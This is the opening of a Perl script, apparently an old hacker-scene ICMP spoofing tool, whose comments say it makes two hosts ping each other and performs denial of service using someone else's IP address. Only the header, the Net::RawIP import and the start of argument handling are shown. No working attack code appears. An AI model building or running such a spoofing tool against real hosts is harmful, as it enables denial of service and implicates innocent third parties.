#!/usr/bin/perl
#
# Spoofing tool for ICMP packages!
#
# Written by zillion. Safemode.org r0cks ;]
#
# - Let 2 hosts ping eachother
# - DoS using someone's ip (DoSsing is lame!)
#
# Check this document and get creative! :
#
# http://www.isi.edu/in-notes/iana/assignments/icmp-parameters
#
# Requires the Net::Raw::IP module for perl
#
use Net::RawIP qw(:pcap);
my($ping,$source,$destination,$type) = @ARGV;
if(@ARGV < 4) {
die"\nUsage $0